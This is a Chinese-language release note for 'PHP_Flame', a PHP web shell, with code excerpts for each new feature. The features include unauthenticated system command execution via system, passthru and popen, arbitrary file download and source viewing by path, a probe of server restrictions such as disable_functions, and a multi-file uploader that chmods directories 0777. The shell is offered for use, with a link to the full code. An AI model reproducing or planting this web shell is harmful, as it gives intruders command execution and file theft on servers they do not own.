I PHP_Flame (Version: Progress ) 的一些信息:
*修正了无法下载文件的BUG
*修正了无法返回上级的BUG
*修正了代码编辑出现错误的BUG
......
*增加PHPINFO的功能
*增加多文件下载的功能
*增加执行系统命令的功能
*增加代码查看功能
*增加服务器安全探测功能
.......
*还有许多美化工作。。。。。。 相关的资料:
1。修正了无法返回上级的BUG的代码:
echo "<a href="$php_self?act=dir&dir=$dir..">返回上级</a>";
2。修正了无法下载文件的相关代码:
case "download":
if (!@is_file($_GET['file_name']))
echo"你要下的文件不存在";
$filename = basename($_GET['file_name']);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP3 Generated Data');
readfile($_GET['file_name']);
break;
3。增加代码查看功能
<a href="<?echo$php_self;?>?actionaa=cmd&method=show_source&cmd=<? echo $_GET['file'];?>" target=_blank>文件代码</a>
4。修正了代码编辑出现错误的代码:
$tem= str_replace("/textarea>","//textarea>",$tem);
。。。。。
$tem= str_replace("//textarea>","/textarea>",$tem);
5。增加服务器安全探测功能:
if (get_cfg_var("safe_mode"))echo"on<br>";else echo"off<br>";
echo "* disable_functions:";$dis_func=get_cfg_var("disable_functions");
if ($dis_func=="")
{
echo("<font color=red><b>no value</b></font>");
}
else
{
$dis_func=str_replace(" ","<br>",$dis_func);
$dis_func=str_replace(",","<br>",$dis_func);
echo("$dis_func");
}
6。执行系统命令部分的代码:
<?
if ($actionaa=="cmd") { ?>
<body bgcolor="#6595d6">
<form name="form1" method="post" action="<?= $PHP_SELF ?>?actionaa=cmd">
<select name="method">
<option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
<option value="opendir" <? if ($method=="opendir") { echo "selected"; } ?>>opendir</option>
<option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
</select><br>
<input type="text" name="cmd" size="40" value="<?= $cmd; ?>">
<input type="submit" name="Submit" value="<?=$method?>">
<br>
</form>
<?
if (!$method) { $method="system"; }
if (!$cmd) {
echo "* JSW'S PHP FLAME<br>";
echo "* Author: JSW<br>";
echo "* safe_mode:";if (get_cfg_var("safe_mode"))echo"on<br>";else echo"off<br>";
echo "* disable_functions:";$dis_func=get_cfg_var("disable_functions");
if ($dis_func=="")
{
echo("<font color=red><b>no value</b></font>");
}
else
{
$dis_func=str_replace(" ","<br>",$dis_func);
$dis_func=str_replace(",","<br>",$dis_func);
echo("$dis_func");
}
echo "<br>* Now please choose a function and enter the command......";
}
echo "<br><pre>";
if ($method=="system") {
system("$cmd 2>&1");
}
if ($method=="passthru") {
passthru("$cmd 2>&1");
}
if ($method=="opendir") {
$h=opendir($cmd);
while($file=readdir($h)) {
echo "$filen";
}
}
if ($method=="show_source") {
if (show_source($cmd)) {
//echo "<pre>";
//echo show_source($file);
//echo "</pre>";
} else {
echo "<script> alert("unable to read file: $file using: show_source"); </script>";
}
}
if ($method=="popen") {
$pp = popen('$cmd 2>&1', 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
}
echo "</pre>";
exit;
}
?>
7。增加文件上载的代码:
<?php
if($dir=="")
$dir="./";
?>
<?
if($tools==upload)
{
for($i=1;$i<21;$i++)
{
$temp1="userfile".$i;
$temp2="userfile".$i."_name";
$source=$$temp1;
$source_name=$$temp2;
if(@$source!="")
{
@$v=file_exists($filedir);
if(!$v)
{
mkdir(@$filedir,0777);
}
@chmod($filedir,0777);
if(file_exists("$filedir/$source_name")=="1")
{
if($up_flag=="y")
{
@unlink($filedir/$source_name);
@copy($source,"$filedir/$source_name");
echo $source_name."已覆盖上传<br>";
}
else
echo $source_name."请重新上传!<br>";
}
else
{
@copy($source,"$filedir/$source_name");
echo $source_name."已上传<br>";
}
}
}//end for
echo"
<html>
<head>
<title>JSW'S PHP FLAME</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href=t.css rel=stylesheet type=text/css>
<script language="javascript">
function setid()
{
str='<br>';
if(!window.uploadForm.upcount.value
window.uploadForm.upcount.value>20
window.uploadForm.upcount.value==0)
window.uploadForm.upcount.value=1;
for(i=1;i<=window.uploadForm.upcount.value;i++)
str+='文件'+i+':<input type="file" name="userfile'+i+'"><br><br>';
window.upid.innerHTML=str+'<br>';
}
</script>
</head>
<body>
<body bgcolor="#6595d6">
<table width="550" border="1" cellspacing="0" cellpadding="5" align="center">
<form name="t" method="get" action="?">
<tr>
<td><li> 1.指定上传目录(默认为本程序所在目录)
<input type="hidden" name="tools" value="upload">
<input type="text" name="dir">
<input type="submit" value="确定" name="t"></td></li>
</tr>
</form>
<form name="uploadForm" method="post" action="?tools=upload&dir=$dir" enctype="multipart/form-data">
<tr>
<td>
<li> 2.需要上传的个数(建议最大值 20)
<input type="text" name="upcount" value="1">
<input type="button" name="Button" onclick="setid();" value="设定">
</li>
<li> 3.全部文件都覆盖上传: <input type="radio" name="up_flag" value="y">是<input type="radio" name="up_flag" value="n" checked>否
</li>
<br>
<br>
您的文件将被上传到: $dir
<input type="hidden" name="filedir" value="$dir">
<a href="?">返回PHP_Flame</a>
</td>
</tr>
<tr>
<td id="upid" height="122"> 文件1:
<input type="file" name="userfile1" value="">
</td>
</tr>
<tr>
<td>
<input type="submit" name="upload" value="上传">
<input type="reset" name="reset" value="重执">
</td>
</tr></form>
</table>
</body>
</html>";
exit;}
?>
。。。。。。
最后指明的是,这个PHP程序是在安然的PHP Command的基础上编写的,在此表示感谢,完整代码: http://jsw.china12e.com/jswsoft/show.php